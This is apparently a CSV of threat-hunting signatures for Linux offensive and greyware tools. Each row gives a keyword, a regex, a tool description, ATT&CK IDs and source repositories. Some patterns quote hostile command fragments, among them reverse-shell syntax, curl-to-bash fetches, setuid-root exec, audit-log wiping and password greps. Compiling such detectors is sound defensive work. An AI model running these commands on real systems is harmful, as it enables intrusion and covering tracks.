"*/var/run/tor/control*",".{0,1000}\/var\/run\/tor\/control.{0,1000}","offensive_tool_keyword","nipe","An engine to make Tor network your default gateway","T1090 - T1095 - T1573","TA0005","N/A","N/A","Defense Evasion","https://github.com/GouveaHeitor/nipe","1","0","#linux","N/A","9","10","1967","315","2024-12-06T11:39:49Z","2015-09-07T18:47:10Z"
"*/var/run/tor/tor.pid*",".{0,1000}\/var\/run\/tor\/tor\.pid.{0,1000}","offensive_tool_keyword","nipe","An engine to make Tor network your default gateway","T1090 - T1095 - T1573","TA0005","N/A","N/A","Defense Evasion","https://github.com/GouveaHeitor/nipe","1","0","#linux","N/A","9","10","1967","315","2024-12-06T11:39:49Z","2015-09-07T18:47:10Z"
"*/var/tmp/.memory/diamorphine.c*",".{0,1000}\/var\/tmp\/\.memory\/diamorphine\.c.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","147","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*/var/tmp/.memory/diamorphine.h*",".{0,1000}\/var\/tmp\/\.memory\/diamorphine\.h.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","147","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*/var/tmp/.socket -p -c ""exec python3 -c \""import os;os.setuid(0);os.setgid(0);os.execl*",".{0,1000}\/var\/tmp\/\.socket\s\-p\s\-c\s\""exec\spython3\s\-c\s\\\""import\sos\;os\.setuid\(0\)\;os\.setgid\(0\)\;os\.execl.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","0","#linux","N/A","9","3","216","22","2024-12-01T21:19:51Z","2024-07-16T15:56:11Z"
"*/var/www/html/dynasty_rce*",".{0,1000}\/var\/www\/html\/dynasty_rce.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","1","#linux","N/A","9","2","147","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*/var0xshell.git*",".{0,1000}\/var0xshell\.git.{0,1000}","offensive_tool_keyword","var0xshell","var0xshell - shell with xor encryption","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/var0xshell/tree/main","1","1","#linux","N/A","8","10","3","1","2023-01-09T06:53:42Z","2023-01-08T21:34:26Z"
"*/vas/fuzzers/fuzz/*",".{0,1000}\/vas\/fuzzers\/fuzz\/.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","1","#linux","N/A","10","6","531","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z"
"*/venom.sh *",".{0,1000}\/venom\.sh\s.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","0","#linux","N/A","N/A","10","1791","600","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z"
"*/view -c ':py3 import os*os.execl(\""/bin/sh\*",".{0,1000}\/view\s\-c\s\'\:py3\simport\sos.{0,1000}os\.execl\(\\\""\/bin\/sh\\.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","#linux","N/A","9","4","371","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*find / -type f -name .htpasswd*",".{0,1000}find\s\/\s\-type\sf\s\-name\s\.htpasswd.{0,1000}","greyware_tool_keyword","find","find commands used by the wso php webshell","T1100 - T1027 - T1059","TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","351","214","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z"
"*raw.githubusercontent.com*.bash*",".{0,1000}raw\.githubusercontent\.com.{0,1000}\.bash.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","#linux","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/work/anyproxy/bin/anyproxy-ca --generate*",".{0,1000}\/work\/anyproxy\/bin\/anyproxy\-ca\s\-\-generate.{0,1000}","greyware_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","0","#linux","anyproxy","10","10","1473","222","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z"
"*getent passwd | cut -d: -f1*",".{0,1000}getent\spasswd\s\|\scut\s\-d\:\s\-f1.{0,1000}","greyware_tool_keyword","getent","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access","N/A","1","0","#linux","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*grep :0: /etc/passwd*",".{0,1000}grep\s\:0\:\s\/etc\/passwd.{0,1000}","greyware_tool_keyword","grep","Look for users with a UID of 0","T1005 - T1083 - T1213","TA0006","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","#linux","N/A","N/A","10","1445","187","2024-11-18T14:07:04Z","2021-08-16T17:34:25Z"
"*[+] - Bashrc persistence added!*",".{0,1000}\[\+\]\s\-\sBashrc\spersistence\sadded!.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#content #linux","N/A","9","2","147","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*[+] - Configuring ~/.bashrc for persistence ... *",".{0,1000}\[\+\]\s\-\sConfiguring\s\~\/\.bashrc\sfor\spersistence\s\.\.\.\s.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#content #linux","N/A","9","2","147","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*grep -R db_passwd*",".{0,1000}grep\s\-R\sdb_passwd.{0,1000}","greyware_tool_keyword","grep","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. # search for plain text user/passwords","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege Escalation","N/A","1","0","#linux","greyware tool - risks of False positive !","3","6","N/A","N/A","N/A","N/A"
"*grep*|pwd=|passwd=|password=*",".{0,1000}grep.{0,1000}\|pwd\=\|passwd\=\|password\=.{0,1000}","greyware_tool_keyword","grep","search for passwords","T1005 - T1083 - T1213","TA0006","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","#linux","N/A","N/A","10","1445","187","2024-11-18T14:07:04Z","2021-08-16T17:34:25Z"
"*[!] Found exploitable Sudo NOPASSWD binary*",".{0,1000}\[!\]\sFound\sexploitable\sSudo\sNOPASSWD\sbinary.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","#content #linux","N/A","6","6","554","71","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z"
"*\LinikatzV2\*",".{0,1000}\\LinikatzV2\\.{0,1000}","offensive_tool_keyword","LinikatzV2","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/LinikatzV2","1","1","#linux","N/A","10","2","138","13","2023-10-19T12:26:58Z","2023-10-19T11:07:53Z"
"*check_sudo_nopasswd_binaries(*",".{0,1000}check_sudo_nopasswd_binaries\(.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","#content #linux","N/A","6","6","554","71","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z"
"*\pamspy.bpf.c*",".{0,1000}\\pamspy\.bpf\.c.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","#linux","N/A","10","10","1119","61","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z"
"*\pamspy_event.h*",".{0,1000}\\pamspy_event\.h.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","#linux","N/A","10","10","1119","61","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z"
"*/changepasswd.py*",".{0,1000}\/changepasswd\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor","Lateral Movement","https://github.com/fortra/impacket","1","1","#linux","N/A","10","10","13621","3597","2024-12-06T20:52:01Z","2015-04-15T14:04:07Z"
"*|/bin/sh -i 2>&1|nc * >/tmp/f*",".{0,1000}\|\/bin\/sh\s\-i\s2\>\&1\|nc\s.{0,1000}\s\>\/tmp\/f.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","#linux","N/A","3","10","27","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z"
"*> /var/log/audit/audit.log* rm -f .*",".{0,1000}\>\s\/var\/log\/audit\/audit\.log.{0,1000}\srm\s\-f\s\..{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked note defense evasion","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/Auditcleaner","1","0","#linux","N/A","N/A","1","1","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z"
"*12e9256bbb969343cc20fa9e259c0af1bf12d6c7bd0263bd7b2a60575b73cf62*",".{0,1000}12e9256bbb969343cc20fa9e259c0af1bf12d6c7bd0263bd7b2a60575b73cf62.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","531","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z"
"*1615016050f681f61f692ef54d34a26911587fff98fa6ee1f945f1ecd04e2705*",".{0,1000}1615016050f681f61f692ef54d34a26911587fff98fa6ee1f945f1ecd04e2705.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","Dispossessor","Discovery","https://github.com/GoFetchAD/GoFetch","1","0","#filehash #linux","N/A","10","7","630","100","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z"
"*/IKEForce*",".{0,1000}\/IKEForce.{0,1000}","offensive_tool_keyword","IKEForce","IKEForce is a command line IPSEC VPN brute forcing tool for Linux that allows group name/ID enumeration and XAUTH brute forcing capabilities.","T1110 - T1201 - T1018","TA0001 - TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/SpiderLabs/ikeforce","1","0","#linux","N/A","N/A","3","235","73","2019-09-18T09:35:41Z","2014-09-12T01:11:00Z"
"*4681186a8bcaff98f0d2513d30add67345491b95f7f743883e6ca2506ba7aaaf*",".{0,1000}4681186a8bcaff98f0d2513d30add67345491b95f7f743883e6ca2506ba7aaaf.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","531","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z"
"*48a7ca531d14b205dfcaaa59b86e78f3f092a2c1c6ccf8c827ee87ba30d3108c*",".{0,1000}48a7ca531d14b205dfcaaa59b86e78f3f092a2c1c6ccf8c827ee87ba30d3108c.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","#filehash #linux","N/A","10","10","1119","61","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z"
"*510898a4922120a3e1e10c935f84e2f939a022b739afb38a42cb1b5e3a00172d*",".{0,1000}510898a4922120a3e1e10c935f84e2f939a022b739afb38a42cb1b5e3a00172d.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","#filehash #linux","N/A","10","10","1119","61","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z"
"*ikeforce.py*",".{0,1000}ikeforce\.py.{0,1000}","offensive_tool_keyword","IKEForce","IKEForce is a command line IPSEC VPN brute forcing tool for Linux that allows group name/ID enumeration and XAUTH brute forcing capabilities.","T1110 - T1201 - T1018","TA0001 - TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/SpiderLabs/ikeforce","1","1","#linux","N/A","N/A","3","235","73","2019-09-18T09:35:41Z","2014-09-12T01:11:00Z"
"*612789c90ec1040d821a985265ea3b2f57e2c8df90b3880752dcb869e45256bc*",".{0,1000}612789c90ec1040d821a985265ea3b2f57e2c8df90b3880752dcb869e45256bc.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","531","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z"
"*665a22568c5d38db4ce74dde13053e8a66baf91356e4f35a9e2957c205a09f1a*",".{0,1000}665a22568c5d38db4ce74dde13053e8a66baf91356e4f35a9e2957c205a09f1a.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","#filehash #linux","N/A","10","10","1119","61","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z"
"*66c368f799227a9b571f841057e2d5f12c862360d5f7f564da9936acd67c66a0*",".{0,1000}66c368f799227a9b571f841057e2d5f12c862360d5f7f564da9936acd67c66a0.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","531","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z"
"*691f577714a4ae22bc22ec49edec5a15bf546a9827e8e1cf4e9e688b2ba9f72e*",".{0,1000}691f577714a4ae22bc22ec49edec5a15bf546a9827e8e1cf4e9e688b2ba9f72e.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","531","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z"
"*8672d46e879f704b4b41a401c1a0aae5e6365f18a798a1fbaa4b1a8e711db34b*",".{0,1000}8672d46e879f704b4b41a401c1a0aae5e6365f18a798a1fbaa4b1a8e711db34b.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","531","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z"
"*9a3a44c544cd596ebf94583614035575e746f57315e20ec56a819c7152ba3fe9*",".{0,1000}9a3a44c544cd596ebf94583614035575e746f57315e20ec56a819c7152ba3fe9.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","531","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z"
"*9bc52d5f3a9d6d2a442de0ee8f417692b2e27993707dd5f07d17b92f9ae84684*",".{0,1000}9bc52d5f3a9d6d2a442de0ee8f417692b2e27993707dd5f07d17b92f9ae84684.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","#filehash #linux","N/A","10","10","1119","61","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z"
"*a0101bdeeb3f99c0640c203716381ef9f6bad8e89973eaa608c801ed3f6ccace*",".{0,1000}a0101bdeeb3f99c0640c203716381ef9f6bad8e89973eaa608c801ed3f6ccace.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","531","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z"
"*a1b3d36a9cc4bc118c646ae5430a6e0fc811f2ec3614a3de9682b5c07eaade2d*",".{0,1000}a1b3d36a9cc4bc118c646ae5430a6e0fc811f2ec3614a3de9682b5c07eaade2d.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","531","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z"
"*aCSHELL/../../../../../../../*",".{0,1000}aCSHELL\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/.{0,1000}","offensive_tool_keyword","POC","CVE-2024-24919","T1005 - T1006 - T1078 - T1110 - T1135 - T1185","TA0001 - TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/LucasKatashi/CVE-2024-24919","1","1","#linux","N/A","10","1","13","5","2024-05-30T17:08:11Z","2024-05-30T16:23:18Z"
"*adf6d464ce449914110607706da329993186f52f99074af1b7b1734a46dd4fcf*",".{0,1000}adf6d464ce449914110607706da329993186f52f99074af1b7b1734a46dd4fcf.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","531","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z"
"*adm|admin|root|sudo|wheel*",".{0,1000}adm\|admin\|root\|sudo\|wheel.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3457","574","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z"
"*agent_code/bash_executor*",".{0,1000}agent_code\/bash_executor.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","#linux","N/A","10","10","49","10","2024-10-29T17:32:07Z","2022-09-28T17:20:04Z"
"*agetty -o -p -l /bin/sh -a root tty*",".{0,1000}agetty\s\-o\s\-p\s\-l\s\/bin\/sh\s\-a\sroot\stty.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","#linux","N/A","9","4","371","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*Airbash*",".{0,1000}Airbash.{0,1000}","offensive_tool_keyword","Airbash","A POSIX-compliant fully automated WPA PSK handshake capture script aimed at penetration testing.","T1565 - T1593 - T1594 - T1567","TA0002 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/tehw0lf/airbash","1","0","#linux","N/A","N/A","4","352","62","2024-10-13T01:02:18Z","2018-04-18T23:50:15Z"
"*All_SubdomainTOP_Seclist.txt*",".{0,1000}All_SubdomainTOP_Seclist\.txt.{0,1000}","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","#linux","N/A","N/A","10","2024","381","2024-06-27T10:07:42Z","2019-07-26T10:26:34Z"
"*b2363d2b238f9336bb270fe96db258243668a916d7ddf94bf3a3126ed7cae508*","b2363d2b238f9336bb270fe96db258243668a916d7ddf94bf3a3126ed7cae508","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","531","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z"
"*b23r0@foxmail.com*",".{0,1000}b23r0\@foxmail\.com.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#linux #email","N/A","10","10","157","27","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z"
"*b8ad30b89d6cabe30501ed963b21dcaec70b3283608682678629feae2c1b2235*","b8ad30b89d6cabe30501ed963b21dcaec70b3283608682678629feae2c1b2235","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","531","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z"
"*backdoor.sh -v * -p *",".{0,1000}backdoor\.sh\s\-v\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","linux-pam-backdoor","Linux PAM Backdoor","T1547.001 - T1556.003","TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/zephrax/linux-pam-backdoor","1","0","#linux","N/A","10","4","314","81","2023-11-13T11:29:44Z","2017-06-08T21:14:34Z"
"*bash ./bounce.sh*",".{0,1000}bash\s\.\/bounce\.sh.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","#linux","N/A","9","1","78","11","2024-04-01T07:49:15Z","2023-12-04T07:05:48Z"
"*bash -c *curl *.sh | bash*",".{0,1000}bash\s\-c\s.{0,1000}curl\s.{0,1000}\.sh\s\|\sbash.{0,1000}","greyware_tool_keyword","bash","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Exploitation tool","N/A","1","0","#linux","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*bash -c *wget *.sh | bash*",".{0,1000}bash\s\-c\s.{0,1000}wget\s.{0,1000}\.sh\s\|\sbash.{0,1000}","greyware_tool_keyword","bash","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Exploitation tool","N/A","1","0","#linux","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*bash extension_injection.sh*",".{0,1000}bash\sextension_injection\.sh.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","0","#linux","on forked repo","10","10","1473","222","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z"
"*bash -i &>/dev/tcp/* <&1*",".{0,1000}bash\s\-i\s\&\>\/dev\/tcp\/.{0,1000}\s\<\&1.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","#linux","N/A","3","10","27","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z"
